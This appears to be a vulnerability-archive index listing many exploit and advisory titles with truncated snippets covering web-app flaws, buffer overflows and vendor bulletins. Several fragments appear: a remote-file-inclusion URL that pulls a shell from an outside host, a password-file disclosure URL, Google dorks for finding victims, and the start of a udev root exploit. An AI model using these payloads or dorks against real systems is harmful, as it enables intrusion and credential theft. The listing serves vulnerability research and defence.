exploit (html) for Advanced Guestbook 2.2
In GOD We Trust; Kachal667 Under9round Team KuT new exploit with HTML for Advanced Guestbook 2.2 . This bug found by BHST. Coded By Hessam-x Note : For use this exploit first change target to victim example : www.targetsite.com/guestbook/admin.php =====HTML CODE : html titleGuestBook 2.2...
Micro Login System v1.0 (userpwd.txt) Password Disclosure Vulnerability
Micro Login System v1.0 userpwd.txt Password Disclosure Vulnerability Affected Software: Micro Login System v1.0 Download: http://www.hotscripts.com/jump.php?listingid=67504&jumptype=1 Bugfounder: 0x90 Contact: Gunsat0x90dotcomdotar homepage: WwW.0x90.CoM.Ar +Exploit: http://target/path/userpwd.t...
@lex Guestbook (PHP) Include file
Informations : °°°°°°°°°°°°°° Website : http://www.alexphpteam.com Version : all Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° ./include/livreinclude.php ------------------------------------------------------------------ if !$noconnect.... some include functions...
vpopmail-3.4.11 problems
The vpopmail package is an extension for Qmail that allows easy management of virtual domains and can use a SQL backend for storing user accounts. The program vchkpw in that package contains a vulnerability in its logging routines. The vchkpw program handles the username/password/domain...
[KIS-2014-07] Dotclear <= 2.6.2 (categories.php) SQL Injection Vulnerability
-------------------------------------------------------------- Dotclear = 2.6.2 categories.php SQL Injection Vulnerability -------------------------------------------------------------- - Software Link: http://dotclear.org/ - Affected Versions: Version 2.6.2 and probably prior versions. -...
PixelPost 1.7.1 File Disclosure
PixelPost 1.7.1 File Disclosure by Charles "real" F. charlesfolathotmail.fr http://realn.free.fr Requires registerglobals = On magicquotesgpc = Off PROOF OF CONCEPT TARGET URL: http://url/addons/copyfolder.php?...
[SA14600] PHPOpenChat "sourcedir" File Inclusion Vulnerability
---------------------------------------------------------------------- Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=l...
[SA12858] YaPiG comments Cross-Site Scripting Vulnerability
TITLE: YaPiG comments Cross-Site Scripting Vulnerability SECUNIA ADVISORY ID: SA12858 VERIFY ADVISORY: http://secunia.com/advisories/12858/ CRITICAL: Less critical IMPACT: Cross Site Scripting WHERE: From remote SOFTWARE: YaPiG 0.x http://secunia.com/product/3795/ DESCRIPTION: A vulnerability has...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...
VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability
========================================================================================== VoltEdit CMS SQL Injection Admin Login Bypass & Shell Upload Vulnerability ==========================================================================================...
Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Mambo comserverstat Component =0.4.4 Remote File Include Vulnerability + =-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-= + +Author: xoron turkish hacker +...
[MajorSecurity Advisory #64]Apple Safari 4.0.4 Denial of Service
MajorSecurity Advisory 64Apple Safari 4.0.4 Denial of Service Details ============ Product: Apple Safari Webbrowser Security-Risk: low Remote-Exploit: yes Vendor-URL: http://www.apple.com/safari/ Vendor-Status: informed Advisory-Status: published on 02-02-2010 Credits ============ Discovered by:...
[Full-Disclosure] iDEFENSE Security Advisory 06.08.04: Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability
Squid Web Proxy Cache NTLM Authentication Helper Buffer Overflow Vulnerability iDEFENSE Security Advisory 06.08.04 www.idefense.com/application/poi/display?id=107&type=vulnerabilities June 8, 2004 I. BACKGROUND Squid is a fully-featured Web Proxy Cache designed to run on Unix systems and supports...
firefly 1.1.01 <= Remote File Include Vulnerablitiy
firefly 1.1.01 = Remote File Include Vulnerablitiy D.Script: http://fresh.t-systems-sfr.com/unix/src/privat2/firefly-1.1.01.tar.gz Discovered by: Alkomandoz Hacker Homepage: asb-may.net & mohandko.com & sniper-sa.com & Tryag.com ====================================...
WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
World Defacers Team --------------------Summary---------------- eVuln ID: WD23 Vendor: phpopenchat-3.0. Vendor's Web Site: http://phpopenchat.org Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS wdzone.net & worlddefacers.de...
UseBB Version 1.0.4 Path Disclosure Vulnerability
netVigilance Security Advisory 16 UseBB Version 1.0.4 Path Disclosure Vulnerability Description: UseBB is an Open Source forum package developed in PHP and using the popular MySQL database back-end to store data. Unlike other popular forum systems, UseBB does not strive to have as many features a...
OpenSSH's UseLogin option allows remote access with root privilege.
OpenSSH's UseLogin option allows remote access with root privilege. 1. Systems affected: The default installation of OpenSSH is not vulnerable, since UseLogin defaults to 'no'. However, if UseLogin is enabled, all versions of OpenSSH prior to 2.1.1 are affected. 2. Description: If the UseLogin...
XSS vulnerability in swfupload in WordPress
Hello 3APA3A! I will draw your attention to XSS vulnerability in swfupload in WordPress. In April there was announced Cross-Site Scripting vulnerability in swfupload.swf in WordPress CVE-2012-3414. It was fixed in WordPress 3.3.2. At that time there was no detailed information about it. Last week...
ASP Discussion Forum Remote XSS Attack
Hi, I found a vulnerability in ASP Discussion Forum. The vulnerability is a Remote XSS Attack. This is the original Advisory: http://colander.altervista.org/advisory/ASPDisc.txt Let me know if you want to post it up or not. Best Regards, Omni -- Email.it, the professional e-mail, gratis per te:...
RichStrong CMS (showproduct.asp?cat=) Remote SQL Injection Exploit
Info: Software: RichStrong CMS HomePage: http://www.hzrich.cn Exploit: Remote Sql Injection High Where: showproduct.asp?cat= Bug Found By: Jose Luis Góngora Fernández|JosS Contact: sys-projectathotmail.com Web: http://www.spanish-hackers.com Dork: "Power by:RichStrong CMS" Dork2: Priv8, xD! +...
DoS in Intel corporation 'InBusiness eMail Station'
Intel corporation 'InBusiness eMail Station' firmware version 1.04.87 latest Denial of service vulnerability. Vendor notification date: 20/10-2000 Public notification date: 20/10-2000 Problem: I found a buffer overflow in the Intel InBusiness eMail Station, which can enable an attacker to execute...
APPLE-SA-2015-09-16-2 Xcode 7.0
APPLE-SA-2015-09-16-2 Xcode 7.0 Xcode 7.0 is now available and addresses the following: DevTools Available for: OS X Yosemite v10.10.4 or later Impact: An attacker may be able to bypass access restrictions Description: An API issue existed in the apache configuration. This issue was addressed by...
SQL Injection in CLANSPHERE
Vulnerability ID: HTB22694 Reference: http://www.htbridge.ch/advisory/sqlinjectioninclansphere.html Product: CLANSPHERE Vendor: csphere.eu http://www.csphere.eu/ Vulnerable Version: 2010.0 Final Vendor Notification: 02 November 2010 Vulnerability Type: SQL Injection Status: Fixed by Vendor Risk...
Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198)
Microsoft Security Bulletin MS10-046 - Critical Vulnerability in Windows Shell Could Allow Remote Code Execution 2286198 Published: August 02, 2010 Version: 1.0 General Information Executive Summary This security update resolves a publicly disclosed vulnerability in Windows Shell. The vulnerabili...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...
CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Advisory Name: libraptor - XXE in RDF/XML File Interpretation Release Date: 2012-03-24 Applications: libraptor / librdf...
[slackware-security] httpd (SSA:2015-198-01)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security httpd SSA:2015-198-01 New httpd packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...
[SECURITY] CVE-2009-3548 Apache Tomcat Windows Installer insecure default administrative password
CVE-2009-3548: Apache Tomcat Windows Installer insecure default administrative password Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 5.5.0 to 5.5.28 Tomcat 6.0.0 to 6.0.20 The unsupported Tomcat 3.x, 4.0.x, 4.1.x and 5.0.x versions may be also affected...
Multiple FPS game servers buffer overflow with PunkBuster
Buffer overflow on oversized packet if PunkBuster protection is turned on...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...
[security bulletin] HPSBPV02891 rev.1 - HP ProCurve Switches, Remote Unauthorized Information Disclosure
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03819065 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03819065 Version: 1 HPSBPV02891 rev....
Etherleak: Ethernet frame padding information leakage (A010603-1)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 @stake, Inc. www.atstake.com Security Advisory Advisory Name: Etherleak: Ethernet frame padding information leakage Release Date: 01/06/2003 Application: Ethernet device driver software Platform: Multiple Severity: Information disclosure Authors: Ofir...
[Full-disclosure] udev exploit
!/bin/sh Linux 2.6 bug found by Sebastian Krahmer lame sploit using LD technique by kcope in 2009 tested on debian-etch,ubuntu,gentoo do a 'cat /proc/net/netlink' and set the first arg to this script to the pid of the netlink socket the pid is udevdpid - 1 most of the time + sploit has to be UNIX...
Wordpress Pingback Port Scanner
Hi folks, Wordpress 3.5 has its XML-RPC Interface enabled by default. See here for more information: http://www.ethicalhack3r.co.uk/security/introduction-to-the-wordpress-xml-rpc-api/ http://codex.wordpress.org/Version3.5Settings I read through the article and took a look at the Pingback API sinc...
Active Link Engine Remote SQL Injection Vulnerability
Title : Active Link Engine Remote SQL Injection Vulnerability Author : CyberGhost My Web Site : http://aspspider.org/cgsecurity Demo Page : http://www.activewebsoftwares.com/demoactivelinkengine Script Page : http://www.activewebsoftwares.com/productinfo.aspx?ProductID=7 Vuln. Username :...
piranha default password/exploit
Hi, In the interest of full disclosure I used an alias the last few times, let's see how this goes as me here are the details of the piranha vulnerability. RE: ISS Security Advisory iss.00-04-24.Piranha To summarize, piranha is a GUI tool for monitoring, configuring, and administering an LVS...
OpenBSD DoS
System crash on ELF parsing...
[ANN][SECURITY] Struts 1 - CVE-2014-0114 -Mitigation Advice Available, Possible RCE Impact
As confirmed in our last announcement, the Apache Struts 1 framework in all versions is affected by a ClassLoader manipulation vulnerability CVE-2014-0114 similar to a recently fixed vulnerability in Struts 2 CVE-2014-0112, CVE-2014-0094 1. Thanks to the efforts of Alvaro Munoz and the HP Fortify...
Belkin WiFi NetCam video stream backdoor with unchangeable admin/admin credentials
Product: Product NetCam WiFi Camera With Night Vision, purchased August 2013 Summary: Live video stream is accessible with user/password of admin/admin. The user/password combination admin/admin cannot be changed by the user. This "feature" is undocumented. To reproduce: 1. Connect webcam to...
Insecure RSA Encryption in jCryption, PEAR Crypt_RSA and Crypt_RSA2
SWITCH-CERT SECURITY ADVISORY ============================= Vulnerability: Insecure Implementation of RSA Encryption Affected Products: jCryption, PEAR CryptRSA, PEAR CryptRSA2 Advisory Date: 2011-11-30 Advisory Author: Daniel Roethlisberger, SWITCH-CERT Introduction Web applications using...
XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
Hello, Microsoft recently published MS11-074. This bulletin concerns mainly SharePoint 2007 and 2010 but CVE-2011-1892 applies too to Office Groove client and server, Office Forms Server 2007 and Office Web Apps 2010. The vulnerability is a "XML External Entity Reference" one, as described in...
Excel 0day : Excel 2000/XP/2003 Style 0day POC
Excel 0day : Excel 2000/XP/2003 Style 0day POC POC http://www.hitcon.org/Nanika.xls Description: A vulnerability has been discovered in Microsoft Excel, which can be exploited by malicious people to compromise a user's system. Excel 2003 & XP EIP- 00xx00xx Click Repair Mode .......Exploit....:P...
Apple Xcode multiple security vulnerabilities
Restrictions bypass, weak encryption, information disclosure, multiple svn vulnerabilities...
Tagger v3 <= BBCodeFile Remote file inclusion
Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dork: intitle:"Tagger LE" inurl:tags.php Visit us :...
CyberShop-ASP 6.0Fx Vulnerable with shopdbtest.asp
$Indonesia - Security Development Team 2000 - 2003 Advisory Name: CyberShop-ASP 6.0Fx Vulnerable with shopdbtest.asp Release Date: 3:41 PM 7/13/03 Application: CyberShop ASP 6.0Fx Platform: Win32 Severity: High BUG Type: Security leak Author: DrPonidi [email protected] Discover by:...
New vulnerabilities in CapCC for WordPress
Hello 3APA3A! I'm informing you about new vulnerabilities in WordPress plugin CapCC http://websecurity.com.ua/2688/. These are Insufficient Anti-automation, Cross-Site Request Forgery and SQL Injection vulnerabilities. Insufficient Anti-automation: This captcha vulnerable to half-automated method...
[UNIX] Pivot Remote Code Execution Vulnerability
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Windows Software Restriction Policy Protection Bypass
Windows Software Restriction Policy Protection Bypass Class: Protection bypass Vector: Local Tested on: Windows XP SP2, Windows Server 2003 SP1 Risk: Low Remark: I don't know, what is it - bug or feature, but I can't find any documentation on this issue. Description: Software Restriction Policies...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...
Advanced Guestbook 2.3.3 upload image bug
TITLE: Advanced Guestbook 2.3.3 upload image error and maybe possible file inclusion! Severity: Well for now I haven't tested it completely but if not patched it may cause a remote command execution and file inclusion. SOFTWARE: Advanced Guestbook 2.3.3 http://www.proxy2.de/ DESCRIPTION: At the...